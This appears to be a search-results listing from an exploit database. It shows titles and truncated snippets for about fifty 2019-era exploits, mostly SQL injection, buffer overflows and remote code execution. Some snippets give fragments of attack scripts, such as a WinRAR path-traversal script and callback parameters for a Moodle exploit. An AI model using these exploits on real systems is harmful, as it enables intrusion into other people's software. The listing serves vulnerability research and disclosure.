39001 matches found
Meeplace Business Review Script SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Meeplace Business Review Script - 'id' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: http://www.meeplace.com Demo Site: http://demo.meeplace.com Version: Lastest Tested on: Kali Linux CVE: N/A ----- PoC: SQLi...
VMware Workstation 14.1.5 / VMware Player 15.0.2 - Host VMX Process Impersonation Hijack Privilege
The VMX process vmware-vmx.exe process configures and hosts an instance of VM. As is common with desktop virtualization platforms the VM host usually has privileged access into the OS such as mapping physical memory which represents a security risk. To mitigate this the VMX process is created wit...
TCPDF 6.2.19 Deserialization / Remote Code Execution Exploit
TCPDF versions 6.2.19 and below suffer from a deserialization vulnerability that can allow for remote code execution. CVE-2018-17057: phar deserialization in TCPDF might lead to RCE --------------------------------------------------------------- Affected products ================= TCPDF While it ...
Canarytokens 2019-03-01 - Detection Bypass Exploit
Exploit Title: Canarytokens 2019-03-01 - Detection Bypass Exploit Author: Benjamin Zink Loft, Gionathan "John" Reale Vendor Homepage: https://thinkst.com/ Version: up to 2019-03-01 Software Link: https://github.com/thinkst/canarytokens Google Dork: N/A CVE: 2019-9768...
Rails 5.2.1 - Arbitrary File Content Disclosure Exploit
Exploit for multiple platform in category web applications ''' Exploit Title: File Content Disclosure on Rails Date: CVE disclosed 3/16 today's date is 3/20 Exploit Author: NotoriousRebel Vendor Homepage: https://rubyonrails.org/ Software Link: https://github.com/rails/rails Version: Versions...
snap - seccomp BBlacklist for TIOCSTI can be Circumvented Exploit
/ snap uses a seccomp filter to prevent the use of the TIOCSTI ioctl; in the source code, this filter is expressed as follows: TIOCSTI allows for faking input man ttyioctl TODO: this should be scaled back even more ioctl - !TIOCSTI In the X86-64 version of the compiled seccomp filter, this result...
DVD X Player 5.5.3 - .plf Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/env python Exploit Title: DVD X Player 5.5.3 Buffer Overflow Date: 20.03.2019 Exploit Author: Paolo Perego - email protected Vendor Homepage: http://www.dvd-x-player.com Software Link:...
uHotelBooking System - system_page SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: uHotelBooking System - 'systempage' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.hotel-booking-script.com Demo Site: https://www.hotel-booking-script.com/demo/ Version: Lastest Tested on: Kali Lin...
The Company Business Website CMS - Multiple Vulnerabilities
Exploit for php platform in category web applications Exploit Title: The Company Business Website CMS - 'username' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.codester.com/items/6806/the-company-business-website-cms Demo Site: http://thecompany.morkocbilisim.com...
NSS Netscape Certificate Sequences CERT_DecodeCertPackage() Crash Vulnerability
NSS suffers from a NULL dereference issue when parsing Netscape Certificate Sequences in CERTDecodeCertPackage. nss: CERTDecodeCertPackage crash with Netscape Certificate Sequences I noticed that the main entrypoint for decoding DER blobs in NSS, CERTDecodeCertPackage, actually handles multiple...
JFrog Artifactory Administrator Authentication Bypass Exploit
JFrog Artifactory versions prior to 6.8.7 suffer from an administrative access bypass vulnerability due to relying on an X-Forwarded-For header. JFrog Artifactory Administrator Authentication Bypass Introduction ============ JFrog Artifactory https://jfrog.com/artifactory/ is a popular universal...
Netartmedia PHP Dating Site - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Php Dating Site - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/datingsite/ Demo Site: https://www.phpscriptdemos.com/dating/ Version: Lastest Tested on: Kali Linux CVE:...
NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow Exploit
Exploit for windows platform in category local exploits Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow Vendor Homepage: http://netsharewatcher.nsauditor.com Software Link: http://netsharewatcher.nsauditor.com/downloads/NetShareWatchersetup.exe Exploit Author: Peyman Forouzan Tested...
Netartmedia PHP Business Directory 4.2 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Business Directory 4.2 - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.phpbusinessdirectory.com/ Demo Site: https://www.bizwebdirectory.com/ Version: 4.2 Tested on: Kali Linux CVE:...
Netartmedia Deals Portal - Email SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Deals Portal - 'Email' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/dealsportal/ Demo Site: https://www.phpscriptdemos.com/deals/i Version: Lastest Tested on: Kali Linu...
PLC Wireless Router GPN2.4P21-C-CN - Incorrect Access Control Exploit
Exploit for hardware platform in category web applications Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Incorrect Access Control Exploit Author: Kumar Saurav Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-incorrect-access-control/ Vendor: ChinaMobile...
Netartmedia Vlog System - email SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Vlog System - 'email' SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/vlogsystem/ Demo Site: https://www.phpscriptdemos.com/vlogs/ Version: Lastest Tested on: Kali Linux...
Netartmedia PHP Mall 4.1 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Mall 4.1 - Multiple SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/mall/ Demo Site: https://www.phpscriptdemos.com/mall/ Version: 4.1 Tested on: Kali Linux CVE: N/A...
PLC Wireless Router GPN2.4P21-C-CN - Cross-Site Request Forgery Exploit
Exploit for hardware platform in category web applications Exploit Title: PLC Wireless Router GPN2.4P21-C-CN -Cross-Site Request Forgery CSRF Exploit Author: Kumar Saurav Reference: https://0dayfindings.home.blog/2019/01/15/plc-wireless-router-gpn2-4p21-c-cn-cross-site-request-forgery-csrf/ Vendo...
Netartmedia PHP Car Dealer - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Car Dealer- SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/autodealer/ Demo Site: https://www.phpscriptdemos.com/autodealer/ Version: Lastest Tested on: Kali Linux CV...
Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia PHP Real Estate Agency 4.0 - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/propertyagency/ Demo Site: https://www.phpscriptdemos.com/agency/ Version: 4.0 Tested on: Kali...
202CMS v10beta - Multiple SQL Injection Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: 202CMS - 'loguser' SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://sourceforge.net/projects/b202cms/ Software Link:...
Advanced Host Monitor 11.92 beta - Local Buffer Overflow Exploit
Exploit for windows platform in category local exploits !/usr/bin/env python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: Advanced Host Monitor 11.92 beta - Local Buffer Overflow EggHunter Date:...
eNdonesia Portal 8.7 - Multiple Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: eNdonesia Portal 'banners.php' SQL Inj. Dork: N/A Date: 19-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage:...
Gila CMS 1.9.1 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Gila CMS search Cross Site Scripting Google Dork: intext:"Powered By Gila CMS" Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://gilacms.com Software Link: https://gilacms.com/packages/downloadRelease/1.9.1.zip Demo Sit...
Google Chrome < M73 - MidiManagerWin Use-After-Free Exploit
Google Chrome M73 - MidiManagerWin Use-After-Free Exploit MidiManagerWin uses a similar instanceid mechanism to the TaskService implementation to ensure that delayed tasks are only executed if the MidiManager instance that they were scheduled on is still alive. However, this instanceid is an int,...
Microsoft VBScript - VbsErase Memory Corruption Exploit
r eax=0000600c ebx=05dc10dc ecx=00000000 edx=00000000 esi=13371337 edi=05c5ca44 eip=6e0fc9fa esp=05c5ca28 ebp=05c5ca48 iopl=0 nv up ei pl zr na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246 VBSCRIPT!VbsErase+0x5a: 6e0fc9fa 8b3e mov edi,dword ptr esi ds:002b:13371337=????????...
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Exploit
Microsoft Edge - Flash click2play Bypass with CObjectElement::FinalCreateObject Exploit Attached is a PoC file that bypasses Flash click2play in Microsoft Edge. This was tested on Windows 10 64bit v 1809 with the latest patches applied. The PoC currently loads a swf from wwwimages.adobe.com...
exacqVision 9.8 Unquoted Service Path Privilege Escalation Vulnerability
exacqVision version 9.8 suffers from an unquoted search path issue impacting the services exacqVisionServer, dvrdhcpserver and mdnsresponder for Windows deployed as part of exacqVision software application. This could potentially allow an authorized but non-privileged local user to execute...
Netartmedia Real Estate Portal 5.0 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/realestate/ Demo Site: https://www.phpscriptdemos.com/realestate/ Versio...
libseccomp < 2.4.0 - Incorrect Compilation of Arithmetic Comparisons Exploit
When libseccomp compiles filters for 64-bit systems, it needs to split 64-bit comparisons into 32-bit comparisons because classic BPF can't operate on 64-bit values directly. libseccomp offers both bitwise comparisons NE, EQ, MASKEDEQ and arithmetic comparisons LT, LE, GE, GT. Bitwise comparisons...
Microsoft Internet Explorer 11 - VBScript Execution Policy Bypass in MSHTML Exploit
!-- Windows: Windows: IE11 VBScript execution policy bypass in MSHTML Platform: Windows 10 1809 not tested earlier Class: Security Feature Bypass Summary: MSHTML only checks for the CLSID associated with VBScript when blocking in the Internet Zone, but doesn’t check other VBScript CLSIDs which...
Google Chrome < M73 - Double-Destruction Race in StoragePartitionService Exploit
Google Chrome M73 - Double-Destruction Race in StoragePartitionService There's a race condition in the destruction of the BindingState for bindings to the StoragePartitionService. It looks like the root cause of the issue is that since we can get two concurrent calls to callbacks returned from...
Netartmedia Jobs Portal 6.1 - SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Jobs Portal 6.1 - SQL Injection Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/jobsportal/ Demo Site: https://www.ittjobs.com/ Version: 6.1 Tested on: Kali Linux CVE: N/A ----- PoC SQL...
Google Chrome < M73 - Data Race in ExtensionsGuestViewMessageFilter Exploit
Google Chrome M73 - Data Race in ExtensionsGuestViewMessageFilter Exploit There appears to be a race condition in the destruction of the ExtensionsGuestViewMessageFilter if the ProcessIdToFilterMap is modified concurrently. See the comment in the code:...
Netartmedia Event Portal 2.0 - Email SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Netartmedia Event Portal 2.0 - 'Email' SQL Injection Date: 19.03.2019 Exploit Author: Ahmet Ümit BAYRAM Vendor Homepage: https://www.netartmedia.net/eventportal/ Demo Site: https://www.phpscriptdemos.com/events/ Version: 2.0...
MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: MyBB Upcoming Events Plugin 1.32 - Cross-Site Scripting Author: 0xB9 Twitter: @0xB9Sec Contact: 0xB9atpm.me Software Link: https://community.mybb.com/mods.php?action=view&pid=1231 Version: 1.32 Tested on: Ubuntu 18.04 CVE:...
Google Chrome < M73 - FileSystemOperationRunner Use-After-Free Exploit
Google Chrome operation OperationID id = nextoperationid++; // TODOhttps://crbug.com/864351: Diagnostic to determine whether OperationID // wrap-around is occurring in the wild. DCHECKoperations.findid == operations.end; // ! If id already in operations, this will free operation...
Jenkins 2.137 and Pipeline Groovy Plugin 2.61 - ACL Bypass and Metaprogramming RCE Exploit
This Metasploit module exploits a vulnerability in Jenkins dynamic routing to bypass the Overall/Read ACL and leverage Groovy metaprogramming to download and execute a malicious JAR file. The ACL bypass gadget is specific to Jenkins versions 2.137 and below and will not work on later versions of...
TheCarProject v2 - Multiple SQL Injection Vulnerability
Exploit for php platform in category web applications =========================================================================================== Exploit Title: TheCarProject v2 - 'manid' SQL Inj. Exploit Author: Mehmet EMIROGLU Vendor Homepage: https://thecarproject.org/ Software Link:...
BMC Patrol Agent - Privilege Escalation Cmd Execution Exploit
This Metasploit module leverages the remote command execution feature provided by the BMC Patrol Agent software. It can also be used to escalate privileges on Windows hosts as the software runs as SYSTEM but only verifies that the password of the provided user is correct. This also means if the...
WinRAR 5.61 - Path Traversal Exploit
Exploit for windows platform in category local exploits !/usr/bin/env python3 import os import re import zlib import binascii The archive filename you want rarfilename = "test.rar" The evil file you want to run evilfilename = "calc.exe" The decompression path you want, such shown below...
BMC Patrol Agent Privilege Escalation / Command Execution Exploit
This Metasploit module leverages the remote command execution feature provided by the BMC Patrol Agent software. It can also be used to escalate privileges on Windows hosts as the software runs as SYSTEM but only verifies that the password of the provided user is correct. This also means if the...
Webmin 1.900 Upload Authenticated Remote Command Execution Exploit
This Metasploit module exploits an arbitrary command execution vulnerability in Webmin 1.900 and lower versions. Any user authorized to the "Upload and Download" module can execute arbitrary commands with root privileges. In addition, if the Running Processes proc privilege is set the user can...
WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit
Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit Date: 16.03.2019 Vendor Homepage:http://www.winavi.com Software Link: http://www.winavi.com/user/download/WinAVIiPod3GPMP4PSPConverter.exe Exploit Author: Achilles Tested Version: 4.4.2 Tested on: Windows XP SP3 EN Windows 7...
Laundry CMS - Multiple Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: Laundry CMS clothcode SQL Inj. Dork: N/A Date: 09-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://laundry.rpcits.co.in/...
Mail Carrier 2.5.1 - MAIL FROM Buffer Overflow Exploit
Exploit Title: Tabs Mail Carrier 2.5.1 MAIL FROM: Buffer Overflow Exploit Author: Joseph McDonagh Vendor Homepage: N/A Software Link: N/A Version: Mail Carrier 2.5.1 Tested on: Windows Vista Home Basic SP2 CVE: None !/usr/bin/python This script started from PWK, Chapter 6 I am re-purposing it Tab...
NetData 1.13.0 - HTML Injection Vulnerability
Exploit for multiple platform in category web applications Author: Marcelo Vázquez aka s4vitar NetData v1.13.0 HTML Injection Vulnerability Exploit Title: NetData v1.13.0 HTML Injection Vulnerability Exploit Author: Marcelo Vázquez aka s4vitar Collaborators: Victor Lasa aka vowkin Vendor Homepage...
Moodle 3.4.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1 user The account username pass The password to the account ip Callback IP port Callback Port course Valid course ID belonging to the...
ICE HRM 23.0 - Multiple Vulnerabilities
Exploit for php platform in category web applications =========================================================================================== Exploit Title: ICE HRM - ’ob’ SQL Inj. Dork: N/A Date: 14-03-2019 Exploit Author: Mehmet EMIROGLU Vendor Homepage: http://icehrm.org Software Link:...